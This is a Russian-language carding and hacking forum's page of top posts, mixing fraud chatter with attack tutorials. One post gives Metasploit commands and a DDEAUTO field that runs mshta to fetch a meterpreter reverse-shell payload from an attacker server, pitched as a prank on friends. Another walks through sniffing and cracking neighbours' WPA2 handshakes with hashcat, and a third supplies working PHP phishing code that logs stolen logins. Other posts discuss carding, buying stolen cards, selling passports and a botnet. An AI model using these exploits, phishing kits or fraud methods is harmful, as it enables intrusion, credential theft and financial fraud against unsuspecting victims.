Перейти к публикации

Таблица лидеров


Популярные публикации

Отображаются публикации с наибольшей репутацией на 23.10.2021 в Сообщения

  1. 1 балл
    Закрыто на проверку , жду автора в ЛС
  2. 1 балл
    Теория DDE exploit используется для динамического обмена данных. Эта уязвимость позволяет передавать данные между приложениями MS Office без взаимодействия между пользователями. Этот метод используется для получения доступа к системе. Можно легко отправить файл другу с данными его "переписки" и он с большим любопытством будет открывать этот файл) Установка Необходимые составляющие для проведения атаки: Устройство с Kali Linux. Устройство с Windows. Microsoft Office (Word). Все описанные действия проводились в Kali Linux. Для начала нам необходимо установить компоненты и добавить их в базу Metasploit. Сначала скачаем эксплоит с помощью команды: wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Далее добавим эту утилиту в папку с эксплоитами Metasploit: mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ После этого можно переходить в msfconsole. Запускаем и производим обновления всех наших путей: msfconsole reload_all После этого можно переходить к генерации нашей полезной нагрузки. Для этого необходимо пошагово выполнять такие команды: use exploit/windows/dde_delivery Далее нам необходимо установить свой сервис чтобы принимать соединение, для этого нужно указать команду со своим IP адресом: set SRVHOST 192.168.177.141 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.177.141 set LPORT 6708 exploit exploit Подготавливаем документ MS Office После этого получаем ссылку, которую нужно вмонтировать в документ MS Office. Для этого переходим в раздел "Вставить"->"Быстрые элементы"->"Поле" (Можно использовать быструю комбинацию CTRL + F9). {DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.1.6:8080/wi9o8uanVgkjv”} После открытия документа откроется сессия. После открытия будут два всплывающих окна. Но они без каких либо запретов, просто уведомления о наличии сторонних связей с другими приложениями. Готовая ссылка Получаем сессию Заключение Вот таким способом можно получить доступ к компьютеру. Дальше смотрите в сторону пост эксплуатации. Там есть очень много чего интересного. Любите своих друзей и не заставляйте их скучать. Можно пошутить вот таким простым, но эффективным способом. Также формулы можно использовать и в других программах MS Office. Для более правдоподобного вида нужно наполнять документы тематическим содержанием.
  3. 1 балл
    Ничего у меня не горит , просто высказал свое сугубо личное мнение
  4. 1 балл
    Как с вами поработать?
  5. 1 балл
  6. 1 балл
    Это для того, что бы правильно настраивать ботов ?
  7. 1 балл
    Наконец то прошел обучение , около недели сидел пыхтел , но вы знаете , смею доложить , что тема оооочень актуальна в наши дни и профиты лопатой по сути грести можно
  8. 1 балл
    многие пользователи наверняка задумались о том, как отключить подобные возможности своего браузера.
  9. 1 балл
    Отлично подойдёт тем, кто не обладает никакими навыками
  10. 1 балл
    Отличная схема и обучили довольно быстро, главное не тупить Рад, что связался с тобой !)
  11. 1 балл
    Я всегда был фанатом багов и уязвимостей «на поверхности», всегда завидовал чувакам, которые пишут эксплойты для самых защищённых ОС, а сам умел только скрипткиддить (термин из нулевых). И сегодня я хотел бы на пальцах показать и рассказать про такую штуку, как вардрайвинг. А точнее, как стандартными средствами MacOS можно добыть пароли от Wi-Fi соседей. Нелёгкая забросила меня на очередную квартиру. Как-то исторически сложилось, что я ленивый. Пару лет назад я уже писал, что моя лень, новая квартира и провод Beeline (бывшая Corbina) помогли мне найти багу у Билайна и иметь бесплатно интернет в их сети. «Сегодня» происходит «подобное», я на новой квартире, нет даже провода, но есть много сетей у соседей. Заколебавшись расходовать мобильный трафик, я решил, что «соседям надо помогать», и под «соседями» я имел введу себя… Когда-то давно я увлекался вардрайвингом, как раз именно до того момента, пока не обнаружил в старой квартире провод Билайна.) Там тоже было много сетей рядом и первое, что пришло в голову — мне нужен wi-fi. С тех пор прошло много лет. Обновляя свои данные про вардрайвинг, я нашёл в сети упоминание, что 90% работы спец.утилит «сегодня» можно сделать стандартными сервисами MacOS. Забегая вперёд, я хотел бы отметить, что не являюсь автором данного метода, я сам нашёл его в забугорном инете, просто, скажем, это вольный перевод и подробное, художественное описание способа добыть wi-fi пароли стандартными методами макоси, не более. Принципы добычи паролей соседского Wi-Fi Надо понимать, что имея Wi-Fi-приёмник, который есть сегодня в любом ноутбуке, ты можешь «снифать» весь беспроводной трафик около себя. Раньше, когда сети были открыты, достаточно было прийти в макдак и за вечер можно было получить 100-200 акков к одноклассникам. Открытая сеть + отсутсвие https делали своё дело. Сейчас всё интереснее, все переходят на https (пользуясь случаем, хочу передать привет Lets Encypt. Любимый Lets Encypt, я в телевизоре и передаю вам привет, спасибо, что вы есть) и даже про WEP уже все забыли, все роутеры юзают WPA2. Но, как известно, меч был придуман раньше щита, и никакой WPA2 не помеха человеку, голодного до интернета и видящего около себя кучу Wi-Fi. Продолжим. Имея Wi-Fi карту, т.е. любой современный ноутбук, мы можем снифать трафик возле себя. Но он бесполезен, ибо зашифрован. Единственное, что можно разобрать из него — метаданные, типа название сетей итп и «рукопожатия», handshake, т.е. авторизации пользователей в сети. Они происходят каждый раз, когда пользователь подключается к wi-fi-сети. Например, когда сосед приходит домой и его смартфон в кармане цепляется к домашнему wi-fi. Если совсем грубо, рукопожатия представляют собой обычный хэш типа md5. Это правда совсем грубо. Ключ там получается путем 4096 раундов SHA1. Если быть точным, то формула такая: Key = PBKDF2(HMAC−SHA1, passphrase, ssid, 4096, 256) Кстати, можно заметить, что замешивается название точки, поэтому при уникальном названии предвычисления не помогают. И это аргумент за то, чтобы менять название точки на свое. И да, я солгал в своём первом абзаце про «дешифрацию», это техническая ошибка и подмена понятий. Конечно, дешифровать хэш невозможно. Это как говорить «лицензия такси», зная, что деятельность такси в РФ не лицензируется. Но просто так удобней ) Так вот. Всё, что нам надо — это найти среди траффика радиосети вокруг себя рукопожатия и «дешифровать» их. И раньше была куча софта для всего этого. Кто-то умел грамотно сканировать радиоканал, кто-то отлично его сниффал в дампы, кто-то находил хэши в дампах, кто-то умел их ломать. Сейчас всё стало проще, благодаря Тиму Куку. 90% работы за стороннее ПО делает стандартное приложение «Беспроводная диагностика». Многие его видели — когда проблемы с Wi-Fi, мак предлагает проверить сеть. Бесполезная утилита, которая даёт советы типа «перезагрузите роутер». Ну, т.е. мне так казалось ) Добываем пароли. Соседи вешайтесь Итак, погнали. Зажимаем Alt и кликаем по логотипу Wi-Fi в верхней панели. Вообще Alt и клик всегда открывает дополнительные опции в MacOS, но это тема отдельного топика. Помимо прочей доп.инфы, которая порой очень полезная, мы можем запустить программу «Беспроводная диагностика». Думаю, все кто пользуются маком, помнят это окно. Но нас интересует другое. Кликаем по пункту меню «Окно» и видим набор дополнительных утилит. И тут прям есть всё, что надо, даже больше ) Конкретно нас интересуют 2 пункта. Сканирование и Анализатор. Первый покажет нам все сети вокруг с доп.инфой, типа на каком канале и на какой частоте работает сеть. Второй пункт позволит сниффать трафик на конкретном канале и частоте. Нажимая на кнопку «Начать» в Анализаторе, Wi-Fi-карточка переключится в режим приёма и начнёт сканировать радиочастоту вокруг себя, дамп будет писаться в /var/tmp. Файлы *.wcap это наши дампы, которые содержат бесполезный для нас траффик и нужные нам рукопожатия. Надо понимать, что нам необходимо поймать именно рукопожатия. Т.е. нам надо поймать и сниффать траффик, когда сосед приходит домой вечером. Либо, если у вас есть ещё одно устройство на макоси, либо любой другой оси, вам помогут нюкеры. Программки, рассылающие поддельные команды деаунтефикации. Например, JamWiFi. Но это если прям совсем не терпится ) На моём опыте, достаточно просто запустить Анализатор в 6 вечера на часок. Далее нам надо поставить naive-hashcat и hashcat-utils. «Стоп» скажите вы, «ты же обещал взлом сетей соседа стандартными методами?» ) Ха! И вы мне поверили?! На самом деле мы стандартными методами сделали 90% работы через GUI. У нас уже есть хэши, всё что нам надо — разбить их. Уверен, можно всё сделать и стандартными утилитами, но проще юзать hashcat. Собираем софт через brew или из сорцов. Первым делом нам надо конвертировать наш дамп, оставив в нём только наши хэши. Этим занимается бинарник cap2hccapx из пакета. # Качаем hashcat-utils git clone https://github.com/hashcat/hashcat-utils.git Cloning into 'hashcat-utils'... remote: Counting objects: 403, done. remote: Total 403 (delta 0), reused 0 (delta 0), pack-reused 403 Receiving objects: 100% (403/403), 114.23 KiB | 61.00 KiB/s, done. Resolving deltas: 100% (257/257), done. # Собираем бины cd hashcat-utils/src/ && make rm -f ../bin/* rm -f *.bin *.exe cc -Wall -W -pipe -O2 -std=gnu99 -o cap2hccapx.bin cap2hccapx.c cc -Wall -W -pipe -O2 -std=gnu99 -o cleanup-rules.bin cleanup-rules.c … cc -Wall -W -pipe -O2 -std=gnu99 -o strip-bsr.bin strip-bsr.c cc -Wall -W -pipe -O2 -std=gnu99 -o strip-bsn.bin strip-bsn.c # Конвертируем дамп ./cap2hccapx.bin /var/tmp/2018.01.25_00-37-45-GMT+3.wcap /var/tmp/home.hccapx Мы видим, что успели перехватить 2 рукопожатия, попробуем «сломать их». Для этого нам нужен naive-hashcat: git clone https://github.com/brannondorsey/naive-hashcat cd naive-hashcat # Собираем софт для osx ./build-hashcat-osx.sh # качаем вордлист для побора wpa/wpa2 сетей пароли (134MB) curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt # указываем адрес нашего дампа и файл, куда будем писать подобранные пассы, 2500 это метка хэшкэту, что надо ломать именно WPA, ну и запускаем naive-hashcat HASH_FILE=/var/tmp/home.hccapx POT_FILE=home-wifi.txt HASH_TYPE=2500 ./naive-hashcat.sh Кошка пошла работать. В среднем у меня на маке я имею скорость в 2000 хешей в секунду, на скрине 7к, но это только старт. Судя по этому документу, на 1080gtx можно получить скорость в 400к хешей в секунду. Однако у меня всего 2 рукопожатия и не такой уж и большой словарь, поэтому пробежаться по нему не составило проблем. Смотрим файл home-wifi.txt, вуаля: Вот и всё. К сожалению, эта сеть через несколько квартир от меня и на другом этаже, пинг 7 секунд ) Надо ловить соседа снизу или брать внешнюю wi-fi-карту с нормальной антенной. Но принцип, думаю, понятен. Удачных сканирований вам, юные подованы вардрайверы. И большое спасибо разработчикам Kali Linux MacOS за такие подарки.
  12. 1 балл
    сегодня пришло все, залив просил на мегафон , проблем в общении не возникло, хотя я долго не мог достутчаться до продавца
  13. 1 балл
    Кое какие моменты не понимаю , отпиши в ЛС , пожалуйста , а то прилюдно стыдно такие вопросы задавать
  14. 1 балл
    Так как нет смс оповещения к карте я не знаю через сколкьо пришли деньги, утром занес депозит, вечером снял лавешку. От души, родной.
  15. 1 балл
  16. 1 балл
    Узнать город, тоже дорогого стоит))
  17. 1 балл
  18. 1 балл
    Карты пришли, вышка просто, за такие то деньги, ну и скидка порадовала ))
  19. 1 балл
    Снял 3т.р После такого, я обязан пригласить вас на свидание !
  20. 1 балл
    Мощный мануал)))))))Никому бы там не оказаться
  21. 1 балл
    Что то подобное уже видел)) Но все равно круто! Думаю кому пригодится) Присоединяюсь к http://www.redbullracingshop.com.au/ http://www.shopjeen.com/ shaneco.com cc+vbv http://www.joyetech.co.uk/ сиги электронные www.eddiebauer.com fallen hero www.joebrowns.co.uk вбв llbean http://www.nbastore.com (shoes and clothing) https://www.footballfanatics.com/ Новички в теме фешевухи, тренеруйтесь
  22. 1 балл
    Салам !Добрые люди подскажите,опасно ли заниматся кардингом?Были случаии что накрывали?Это раздел для меня нулевой,всю жизнь занимался созданием сайтами и решил попробывать.
  23. 1 балл
  24. 1 балл
    Парень красава,слов нет.На дворе 21 век,люди продвигаются вперед в компьютерных технологиях,сами губим себя)))
  25. 1 балл
    Заключённый Нил Мур (Neil Moore) совершил побег из лондонской тюрьмы, обманув охранников поддельным письмом об освобождении, однако через несколько дней после обнаружения пропажи сдался в руки правосудия. 13 марта адвокаты приехали в тюрьму лондонского района Уондсворт, чтобы поговорить с 28-летним заключённым Нилом Муром, однако, к своему удивлению, не обнаружили его в стенах исправительно учреждения. Как выяснилось, Мур, обвиняемый в мошенничестве, каким-то образом беспрепятственно покинул свою камеру тремя днями ранее. В результате дальнейшего расследования выяснилось, что мужчине удалось раздобыть в тюрьме смартфон, с помощью которого он и реализовал свой план. С помощью устройства Мур создал поддельный домен, почти не отличающийся от того, что используется судебной службой, и отправил на электронную почту тюрьмы, где отбывал наказание, инструкции к своему освобождению. Для дополнительного реализма мошенник также зарегистрировал поддельный сайт, к которому отсылалось письмо, на имя детектива-инспектора Криса Сула (Chris Soole) с указанием всех необходимых контактных данных Королевского суда. Прокурор Йен Пэтон (Ian Paton), занимавшийся расследованием побега, назвал произошедшее «примером чрезвычайной уголовной изобретательности и коварства». Ранее Мур использовал четыре поддельных личности, чтобы присвоить около 1,8 миллиона фунтов стерлингов. Выдав себя за представителей нескольких банков, он убедил коммерческие организации доверить ему крупные суммы денег. Зачастую мошенник разыгрывал для своих жертв целые спектакли, говоря за несколько сотрудников банка мужскими и женскими голосами, якобы передавая телефонную трубку. Спустя три дня после обнаружения пропажи Мур сдался властям и признался в восьми случаях мошенничества и побеге. Приговор ему будет вынесен 20 апреля.
  26. 1 балл
    Всем привет. Сегодня покажу вам как сделать фейк, многие мануалы не понятно расписаны новичкам, потому-что в них требуются хотя бы начальное знание азов HTML. Чтож в моем обучающем мануале, такого не будет, распишу все очень очень понятно. Ну все начали)) Заходим на страницу, которую нам надо подделать. Нажимаем CTRL+S Все мы сохранили страницу. Можем сделать так: сохранить как Если картинки не грузятся, то просто скачиваем их, или скриним. Потом в скачанном файле, прописываем путь к ним. Или же способ немного лучше, но потруднее: Открываем исходный код делается это так CTRL+U Прописываем абсолютные пути ко всем картинкам и таблицам стилей (оригинальным). Это чтобы картинки и ЦССки грузились с сервака. Теперь открываем блокнотом или любым другим редактором. Займемся поиском тегов, которые относятся к Логину и Паролю [Ведь смысл фейка красть логин и пароль] меняем значение аттрибута action на Submit.php Слово action можно найти воспользовавшись поиском. Получится так >>> action="submit.php" Сейвимся, Клосаем. Делаем файл submit.php Пишем туда следующее: <?php /** * xakarders.ru * Это я вам CyKa фейк сделал * vzlom.htm */ @include 'config.php'; $req=array( 'HTTP_REFERER'=>$_SERVER['HTTP_REFERER'], 'HTTP_USER_AGENT'=>$_SERVER['HTTP_USER_AGENT'], 'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'], 'REMOTE_PORT'=>$_SERVER['REMOTE_PORT'], 'REQUEST_URI'=>$_SERVER['REQUEST_URI'], 'REQUEST_TIME'=>$_SERVER['REQUEST_TIME'], ); $desc=fopen('logs.txt','at+'); fwrite($desc,print_r($req,true)."\n\n\n".print_r($_REQUEST,true)."\n\n\n=====================\n\n\n"); fclose($desc); header('Location: '.$loc); ?> Создаем файл config.php <?php /** * Это я вам CyKa фейк сделал * vzlom.htm */ // Сюда впишите ссылку на переадресацию: $loc='http://suka.ru'; ?> Остался самый последний штрих. Создаем наш корзинку, куда получим данные. А т.е. logs.txt Теперь создаем аккаунт на любом бесплатном хостинге. Заливаем через FTPешку, Везде поставьте полномочия 777, иначе пароли не придут. Впариваем жертве. И ОК. Получаем пароль в корзинку.
  27. 1 балл
    Слыхали ,что лампу вообще положили,взломали серв и удалили все))))пустая теперь лампа стал.....Кто конекретно взялся за форумы
  28. 1 балл
    кто ни будь сможет меня научить пользоватся палкой, и все подробно расскащать?
  29. 1 балл
    Пишите в аську либо на мыло enzo83@inbox.ru Актуально, в продаже комплекты со всеми страницами паспорта + доп. документы.
  30. 1 балл
    "само" дело никогда не пойдет, его нужно все время двигать.двигать
  31. 1 балл
    К сожалению данные идеи уже реализованы,поэтому больше шансов, что они не выгорят.
  32. 1 балл
    Только вот: "Куем бабло на РОДИТЕЛЯХ новорожденных..." Детки-конфетки требуют много затрат. Но часть из них можно избежать. Все, что для именно новорожденных - максимум пользуется месяц-год, а носится бывает и вообще пару раз. Как мамашка двоих детей могу сказать: не покупайте новые кроватки (или навороченные кроватки), пеленальные столики, балдахины, кучу одежки (не факт что вы вообще часть из нее хоть раз оденете на свое чадо). Даже питание и то я считаю надо покупать подешевле, в составе нет особой разницы, а вот если Ваш бюджет семейный не треснет по швам - вы будете спокойнее. И ребенок соответсвенно тоже. Отвлеклась. Итог: все, что можно взять у знакомых - берите! И лишь то, что не нашли у знакомых - покупайте. И покупайте только после рождения ребенка
  33. 1 балл
    Есть еще вариант вкладывать в антикварные ювелирные изделия, они всегда будут цениться, особенно с прошествием времени... А если и инвестировать в драгоценности, то непосредственно в их добычу...
  34. 1 балл
    по фото оценить не реально, их легко подделать и нужных деталей как техника, цветопередача, материалы, колористика фото не покажет. для оценки нужен детальный анализ
  35. 1 балл
    Jekaterina862@yahoo.com
  36. 1 балл
  37. 1 балл
    Могу в ботнете поискать тебе, вроде были AU.
  38. 1 балл
    ну если там симка есть значит будет определяться, как на сотовом операторе скинь модем, с симкои и все
  39. 1 балл
    Дампы. Встретил наконец адекватную прошивку. Расстояние только пока 10 см с натяжкой.
  40. 1 балл
    Запомните раз и на всегда: КОНСТИТУЦИЯ УКРАИНЫ Статья 59. Каждый имеет право на правовую помощь. В предусмотренных законом случаях эта помощь предоставляется бесплатно. Каждый свободен в выборе защитника своих прав. Для обеспечения права на защиту от обвинения и предоставления правовой помощи при решении дел в судах и других государственных органах в Украине действует адвокатура. Статья 62. Лицо считается невиновным в совершении преступления и не может быть подвергнуто уголовному наказанию, пока его вина не будет доказана в законном порядке и установлена обвинительным приговором суда. Никто не обязан доказывать свою невиновность в совершении преступления. Обвинение не может основываться на доказательствах, полученных незаконным путем, а также на предположениях. Все сомнения относительно доказанности вины лица истолковываются в его пользу. В случае отмены приговора суда как неправосудного государство возмещает материальный и моральный ущерб, причиненный безосновательным осуждением. А вот это ЗАЗУБРИТЬ: Статья 63. Лицо не несет ответственности за отказ давать показания или объяснения в отношении себя, членов семьи или близких родственников, круг которых определяется законом. Подозреваемый, обвиняемый или подсудимый имеет право на защиту. Осужденный пользуется всеми правами человека и гражданина, за исключением ограничений, определенных законом и установленных приговором суда. А это будут инкриминировать (по практике - сразу букетом): УГОЛОВНЫЙ КОДЕКС УКРАИНЫ: Статья 185. Кража 1. Тайное похищение чужого имущества (кража) — наказывается штрафом до пятидесяти не облагаемых налогом минимумов доходов граждан или исправительными работами на срок до двух лет, или лишением свободы на срок до трех лет. 2. Кража, совершенная повторно или по предварительному сговору группой лиц, — наказывается ограничением свободы на срок до пяти лет или лишением свободы на тот же срок. 3. Кража, соединенная с проникновением в жилище, иное помещение либо хранилище или причинившая значительный ущерб потерпевшему, — наказывается лишением свободы на срок от трех до шести лет. 4. Кража, совершенная в крупных размерах, — наказывается лишением свободы на срок от пяти до восьми лет. 5. Кража, совершенная в особо крупных размерах или организованной группой, — наказывается лишением свободы на срок от семи до двенадцати лет с конфискацией имущества. Статья 190. Мошенничество 1. Завладение чужим имуществом или приобретение права на имущество путем обмана либо злоупотребления доверием (мошенничество) — наказывается штрафом до пятидесяти не облагаемых налогом минимумов доходов граждан или исправительными работами на срок до двух лет, или ограничением свободы на срок до трех лет. 2. Мошенничество, совершенное повторно или по предварительному сговору группой лиц, или причинившее значительный ущерб потерпевшему, — наказывается штрафом от пятидесяти до ста не облагаемых налогом минимумов доходов граждан или исправительными работами на срок от одного до двух лет, или ограничением свободы на срок до пяти лет, или лишением свободы на срок до трех лет. 3. Мошенничество, совершенное в крупных размерах, или путем незаконных операций с использованием электронно-вычислительной техники, — наказывается лишением свободы на срок от трех до восьми лет. 4. Мошенничество, совершенное в особо крупных размерах или организованной группой,— наказывается лишением свободы на срок от пяти до двенадцати лет с конфискацией имущества. Статья 198. Приобретение или сбыт имущества, заведомо добытого преступным путем Заранее не обещанное приобретение или сбыт либо хранение имущества, заведомо добытого преступным путем, — наказывается арестом на срок до шести месяцев, или ограничением свободы на срок до трех лет, или лишением свободы на тот же срок Статья 209. Легализация (отмывание) денежных средств и иного имущества, приобретенных преступным путем 1. Совершение финансовых операций и других сделок с денежными средствами и иным имуществом, приобретенных заведомо преступным путем, а также использование указанных средств и иного имущества для осуществления предпринимательской или иной хозяйственной деятельности, а также создание организованных групп в Украине либо за ее пределами для легализации (отмывания) денежных средств и иного имущества, приобретенных заведомо преступным путем, — наказываются штрафом от пятисот до трех тысяч не облагаемых налогом минимумов доходов граждан или ограничением свободы на срок от трех до пяти лет, или лишением свободы на срок до трех лет, с конфискацией денежных средств и иного имущества, приобретенных заведомо преступным путем. 2. Те же действия, совершенные повторно или по предварительному сговору группой лиц, — наказываются лишением свободы на срок от пяти до двенадцати лет с- конфискацией денежных средств и иного имущества, приобретенных заведомо преступным путем, и с конфискацией имущества. Статья 361. Незаконное вмешательство в работу электронно-вычислительных машин (компьютеров), систем и компьютерных сетей 1. Незаконное вмешательство в работу автоматизированных электронно-вычислительных машин, их систем либо компьютерных сетей, повлекшее искажение либо уничтожение компьютерной информации или носителей такой информации, а также распространение компьютерного вируса путем применения программных и технических средств, предназначенных для незаконного проникновения в эти машины, системы либо компьютерные сети и способных повлечь искажение или уничтожение компьютерной информации или носителей такой информации, — наказываются штрафом до семидесяти не облагаемых налогом минимумов доходов граждан или исправительными работами на срок до двух лет, или ограничением свободы на тот же срок. 2. Те же действия, если они причинили существенный вред или совершены повторно либо по предварительному сговору группой лиц, — наказываются ограничением свободы на срок до пяти лет или лишением свободы на срок от трех до пяти лет Статья 362. Хищение, присвоение, требование компьютерной информации или завладение ею путем мошенничества либо злоупотребления служебным положением 1. Хищение, присвоение, требование компьютерной информации или завладение ею путем мошенничества либо злоупотребления должностным лицом своим служебным положением — наказываются штрафом от пятидесяти до двухсот не облагаемых налогом минимумов доходов граждан или исправительными работами на срок до двух лет. 2. Те же действия, совершенные повторно или по предварительному сговору группой лиц, — наказываются штрафом от ста до четырехсот не облагаемых налогом минимумов доходов граждан или ограничением свободы на срок до трех лет, или лишением свободы на тот же срок. 3. Действия, предусмотренные частями первой или второй настоящей статьи, если они причинили существенный вред, — наказываются лишением свободы на срок от двух до пяти лет. Статья 363. Нарушение правил эксплуатации автоматизированных электронно-вычислительных систем 1. Нарушение правил эксплуатации автоматизированных электронно-вычислительных машин, их систем либо компьютерных сетей лицом, ответственным за их эксплуатацию, если это повлекло хищение, искажение либо уничтожение компьютерной информации, средств ее защиты, или незаконное копирование компьютерной информации, или существенное нарушение работы таких машин, их систем либо компьютерных сетей, — наказывается штрафом до пятидесяти не облагаемых налогом минимумов доходов граждан или лишением права занимать определенные должности либо заниматься определенной деятельностью на срок до пяти лет, или исправительными работами на срок до двух лет. 2. То же деяние, если оно причинило существенный вред, — наказывается штрафом до ста не облагаемых налогом минимумов доходов граждан или исправительными работами на срок до двух лет, или ограничением свободы на срок до пяти лет, с лишением права занимать определенные должности либо заниматься определенной деятельностью на срок до трех лет или без такового.
  41. 1 балл
    всем спасибо, понятно одно - закон сырой, крутят как хотят :mrgreen:
  42. 1 балл
    можешь даже не париться! не вариант!
  43. 1 балл
    прочтите книгу Ю.М. Антоняна "Психология убийств"
  44. 1 балл
    нету такого понятия "средний кардер" .В мире кардинга абсолютно разные профили,и доходы соответственно разные!!! кто-то ломает,другие заливают,третие налят,четвертые работают со счета (это так,простым языком),очень много разных направлений
  45. 1 балл
  46. 1 балл
    АСАВ я себе депозитный счёт делал для себя официально по совему паспорту в МДМ банке, в торговом центре, там небольшой филиал, там постоянно пополняю его, при заключении договора ваабще не проверяди паспорт, при пополнения не проверяют паспорт, просто с него данные списала девушка и всё...
  47. 1 балл
    Характер возможной КРИМИНОГЕННОСТИ обусловлен, прежде всего, масштабностью мотивов. Да, в натуре Скорпиона присутствуют и мстительность, и беспощадность, и поистине самурайское терпение в ожидании часа страшной мести. Скорпиона отличает от других знаков Зодиака именно масштабность, шекспировская глубина мотивов злодеяний. Скорпион - убежденный индивидуалист, он, как правило, напрочь лишен стадного инстинкта, это своеобразный граф Монтекристо, мститель-одиночка. Скорпионы лишь в исключительных случаях участвуют в групповых преступлениях, дьявольски изобретателен в планировании преступлений. Своей конечной целью ставит не столько видимый результат и не столько мучения жертвы, но сам факт свершившегося возмездия. Скорпионы-убийцы сочетают в себе незаурядную дерзость и столь же незаурядную осмотрительность при совершении преступлений. Можно не сомневаться, что большинство виновников в нераскрытых убийств - Скорпионы. В общем, числе убийц занимают весьма скромное одиннадцатое место, но в списке особо опасных - четвертое. Скорпионы-насильники, как правило, руководствуются в своих действиях соображениями мести, а не разрушения, как такового. Скорпион может изнасиловать жертву, которая нанесла ему значительный ущерб или оскорбила его тем или иным образом. В общем, списке насильников они на последнем месте.
  48. 1 балл
    не важно сколько ему лет, главное что бы наркоманом не был.
  49. 1 балл
    Всем привет. Начал ковырять смарт карты. Подключил осциллограф к контакту I/O смарт карты и возник такой вопрос - как определить какие именно данные передаёт сама карта и какие данные передаёт аппарат который подключен к карте? Дело в том что все данные смешаны а мне надо проанализировать отдельно данные которые идут с карты на аппарат и наоборот проанализировать данные которые идут с аппарата на карту. Спасибо.
  50. 1 балл
    Характер возможной КРИМИНОГЕННОСТИ обусловлен, прежде всего, властно-агрессивной натурой Льва с установкой на решительное подавление любого противодействия. Лев лишен тревожности, ему чужда зависть или мстительность. Завышенная самооценка сочетается в нем с непоколебимой верой в свою правоту и дерзкой решительностью для достижения поставленной задачи. Для Львов характерны отчаянные разбойные нападения, террористические акты, но без изощренной жестокости. Лев способен пустить поезд под откос, но не будет мучить жертву раскаленным шилом. Львы-убийцы отличаются дерзостью и масштабностью действий, несколько показной демонстрацией силы и азартностью. Львы-насильники руководствуются крайним тщеславием, игнорированием каких бы то ни было запретных барьеров и стремлением сломить сопротивление жертвы, подчинить ее своей воле и продемонстрировать свое превосходство. В списке убийц Львы занимают первое место, но среди особо опасных преступников занимают пятое место, насильников - седьмое.
×
×
  • Создать...